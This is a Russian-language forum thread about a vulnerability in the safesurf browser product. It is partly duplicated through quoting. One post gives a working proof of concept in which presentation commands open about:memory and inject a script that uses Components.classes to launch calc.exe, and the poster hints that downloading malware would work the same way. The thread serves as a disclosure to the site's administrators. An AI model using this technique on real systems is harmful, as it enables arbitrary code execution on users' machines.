уязвимость
уязвимость
Добрый день, обнаружил достаточно серьезную уязвимость на вашем сайте, с кем можно поговорить по этому вопросу? писал в скайп jetswaplive, в техподдержку не отвечают.
Re: уязвимость
Здравствуйте дорогие детки. Сейчас я расскажу сказку о том как запустить вирус на любой машинке, где установлен safesurf
Собственно уязвимость в том, что safesurf позволяет открыть через команды презентации внутренние страницы браузера, такие как about:memory и т.д., через которые можно получить доступ к Components.classes.
Презентация может быть такой
Ну, собственно, так можно запустить калькулятор (содержимое inject.js):
Закачать и запустить какую-нибудь злобную программку, думаю, тоже труда не составит. Делайте выводы господа администраторы...
____________________________________________________
Проверим
loller5
____________________________________________________
Да уж, как я понимаю, работает только с данной странице, т.к. есть загрузка файла?
loller5
Добавлено в 29 апр 2015, 19:02Собственно уязвимость в том, что safesurf позволяет открыть через команды презентации внутренние страницы браузера, такие как about:memory и т.д., через которые можно получить доступ к Components.classes.
Презентация может быть такой
Код: Выделить всё
Переход about:memory
Вставить скрипт <dls(path_to/inject.js)>
Код: Выделить всё
var file = Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile);
file.initWithPath("C:\\Windows\\System32\\calc.exe");
file.launch();
Закачать и запустить какую-нибудь злобную программку, думаю, тоже труда не составит. Делайте выводы господа администраторы...
____________________________________________________
Проверим
loller5
____________________________________________________
Да уж, как я понимаю, работает только с данной странице, т.к. есть загрузка файла?
loller5
Ну я другие страницы не смотрел, может на каких-то еще возможно.
Re: уязвимость
а то что я написал вообще никого не интересует...